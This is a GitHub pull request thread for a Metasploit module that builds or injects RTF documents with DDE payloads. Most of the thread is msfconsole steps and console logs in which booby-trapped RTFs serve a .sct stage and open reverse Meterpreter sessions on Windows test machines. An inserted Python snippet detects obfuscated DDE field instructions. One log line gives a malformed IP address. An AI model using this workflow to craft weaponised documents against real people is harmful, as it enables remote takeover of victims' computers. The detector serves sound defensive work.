Office DDE RTF Generation & Injection #9282

Merged: 9 commits, Dec 14, 2017

Conversation

ghost commented Dec 7, 2017

In light of learning about RTFs, I thought I'd revisit this PR (#9120) and retry it. And yes! It worked, haha.

The module abuses a feature in MS Field Equations that allows a user to execute an arbitrary application.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do: use exploit/windows/fileformat/office_dde_delivery
  3. Do: set PAYLOAD [PAYLOAD]
  4. Do: run

msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
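As an added defensive example (not code from this PR or from the Metasploit module), the following Python check finds DDE and DDEAUTO field instructions in an RTF document, first undoing the common RTF tricks that split the keyword (hex escapes, control words, nested groups) so a scanner does not miss it. The two sample documents are constructed for the example and the executable path in the DDE field is a placeholder.

```python
import re

# Constructed sample documents (not from the PR or the module). The DDE field's
# target is a placeholder path, not a real command.
BENIGN_RTF = r'{\rtf1\ansi{\field{\*\fldinst { DATE \\@ "d MMMM yyyy" }}{\fldrslt {14 December 2017}}}}'
DDE_RTF = (
    r"{\rtf1\ansi{\field{\*\fldinst {\rtlch\fcs1 DDE\fcs0 AUTO "
    r'"C:\\PLACEHOLDER\\app.exe" "argument"}}{\fldrslt {Click here to update}}}}'
)

# One left-to-right pass over: \'hh hex escapes, escaped \\ \{ \}, control words, bare braces.
TOKEN = re.compile(
    r"\\'(?P<hex>[0-9a-fA-F]{2})|\\(?P<esc>[\\{}])|\\[A-Za-z]+-?\d* ?|(?P<brace>[{}])"
)
DDE_FIELD = re.compile(r"^DDE(?:AUTO)?\b", re.IGNORECASE)


def field_instructions(rtf):
    """Yield the raw body of every \\fldinst group, honouring nested braces."""
    for m in re.finditer(r"\\fldinst", rtf):
        depth, body = 1, []
        for ch in rtf[m.end():]:
            if ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
                if depth == 0:
                    break
            body.append(ch)
        yield "".join(body)


def _untoken(m):
    if m.group("hex"):
        return chr(int(m.group("hex"), 16))
    if m.group("esc"):
        return m.group("esc")
    return ""  # control words and group braces carry no field text


def normalize(instruction):
    """Collapse obfuscation so a keyword split across control words or groups reads whole."""
    return " ".join(TOKEN.sub(_untoken, instruction).split())


def dde_fields(rtf):
    """Return the normalized text of every DDE/DDEAUTO field instruction in an RTF document."""
    return [text for text in map(normalize, field_instructions(rtf)) if DDE_FIELD.match(text)]
```

Running `dde_fields` over a file's contents returns the decoded instruction text, which is what a mail gateway or endpoint rule would log and alert on.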

Austin added 2 commits December 6, 2017 21:41
Generate / Inject existing RTF files with DDE Payloads!
wvu (Contributor) commented Dec 7, 2017

Congration

ghost (Author) commented Dec 7, 2017

Updated, fixed it up with default options. DisablePayloadHandler FALSE, duh! haha

msf exploit(windows/fileformat/office_dde) > run

[*] Started HTTP reverse handler on http://-snip-:3511
[*] Using URL: http://0.0.0.0:3516/Ond0RaFJ
[*] Local IP: http://-snip-:3516/Ond0RaFJ
[*] Server started.
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Handling request for .sct from -snip-
[*] Delivering payload to -snip-...
[*] http://-snip-:3511 handling request from -snip-; (UUID: wzojxigk) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 4 opened (-snip:3511 -> -snip-:50179) at 2017-12-07 13:45:19 -0500
^C[-] Exploit failed: Interrupt
[*] Server stopped.
msf exploit(windows/fileformat/office_dde) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > id
[-] Unknown command: id.
meterpreter > sysinfo
Computer        : AUSTIN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > migrate -h
--snip--

ghost (Author) commented Dec 7, 2017

And injecting...

msf exploit(windows/fileformat/office_dde) > set FILENAME pendelum.rtf
FILENAME => pendelum.rtf
msf exploit(windows/fileformat/office_dde) > set FOLDER_PATH /tmp
FOLDER_PATH => /tmp
msf exploit(windows/fileformat/office_dde) > run

[*] Started reverse TCP handler on -snip-:35116
[*] Using URL: http://0.0.0.0:3516/BhTWvCIJHs
[*] Local IP: http://-snip-:3516/BhTWvCIJHs
[*] Server started.
[*] Injecting /tmp/pendelum.rtf...
[+] pendelum.rtf stored at /root/.msf4/local/pendelum.rtf
[*] Handling request for .sct from -snip-
[*] Delivering payload to -snip-..
[*] Sending stage (179779 bytes) to -snip-
[*] Meterpreter session 10 opened (-snip-:35116 -> -snip-:50786) at 2017-12-07 14:35:11 -0500

ghost (Author) commented Dec 13, 2017

I'll attempt to include docx injection, no guarantees though that I'm able to do it.

@wchen-r7 wchen-r7 self-assigned this Dec 13, 2017
@wchen-r7 wchen-r7 self-requested a review December 13, 2017 19:17
wchen-r7 (Contributor) commented:
@realoriginal The template injection is nice to have, but not required. When the Office macro exploit was first published, it didn't support template injection, either :-)

ghost (Author) commented Dec 13, 2017

Haha :D Yeah, I'm trying to get it by basing it off that one you made, but I'm having some issues unfortunately; I guess I'm still wrapping my head around the parsing with Nokogiri and zipping those files back together, hilariously.

wchen-r7 (Contributor) commented:
Works as advertised:

msf exploit(windows/fileformat/office_dde_delivery) > run

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/PY25sEyYUu
[*] Server started.
[+] msf.rtf stored at /Users/wchen/.msf4/local/msf.rtf
[*] Handling request for .sct from 172.16.85.134
[*] Delivering payload to 172.16.85.134...
[*] Sending stage (179779 bytes) to 172.16.85.134
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.134:49160) at 2017-12-13 18:14:28 -0600

@wchen-r7 wchen-r7 merged commit 900f7d6 into rapid7:master Dec 14, 2017
wchen-r7 added a commit that referenced this pull request Dec 14, 2017

wchen-r7 (Contributor) commented:

Release Notes

This module generates a Microsoft Office RTF document with a malicious DDE payload.
